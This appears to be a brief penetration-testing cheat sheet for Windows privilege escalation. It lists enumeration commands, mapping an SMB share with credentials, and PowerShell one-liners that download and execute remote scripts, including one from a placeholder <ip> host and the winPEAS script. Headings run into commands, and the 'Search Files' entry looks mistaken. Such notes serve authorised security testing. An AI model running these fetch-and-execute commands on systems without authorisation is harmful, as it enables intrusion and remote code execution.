Windows Privilege Escalation
System Enumeration
List Users
net userUser Privileges
whoami /privSearch Files
cmd /s <FILE>List Recursive Directories
tree /FAdd SMB share to network drives
net use z: \\<ip>\<share> /user:<user> <pass>Execute Remote PowerShell Script
IEX(New-Object Net.WebClient).downloadString('http://<ip>/script.ps1')powershell "IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')"